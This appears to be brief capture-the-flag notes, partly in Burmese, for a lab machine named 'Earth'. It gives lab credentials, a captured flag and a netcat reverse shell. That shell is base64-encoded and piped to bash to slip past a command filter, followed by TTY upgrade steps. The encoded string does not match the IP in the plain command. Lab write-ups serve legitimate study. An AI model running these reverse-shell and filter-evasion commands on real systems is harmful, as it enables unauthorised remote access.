user : terra
pass : earthclimatechangebad4humans run command
whoami
ls /var/earth_web
cat /var/earth_web/user_flag.txt
**flag : [user_flag_3353b67d6437f07ba7d34afd7d2fc27d]
rever shell simple method
host machine nc -lvnp 4444
target machine မှာ
nc -e /bin/bash 192.168.200.5 4444
**it will not woking coz
Remote connections are forbidden
use encode version
reverse shell online base 64 change ပါ မယ်
echo 'nc -e /bin/bash 192.168.200.5 4444' | base64
bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMjAwLjcgNDQ0NAo
target machine မှာ ပြန်ပြီး ဒီဟာကို ရိုက်မယ်
echo 'bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMjAwLjcgNDQ0NAo' | base64 -d | bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'
Ctrl + Z [Background Process]
stty raw -echo ; fg ; reset
stty columns 200 rows 200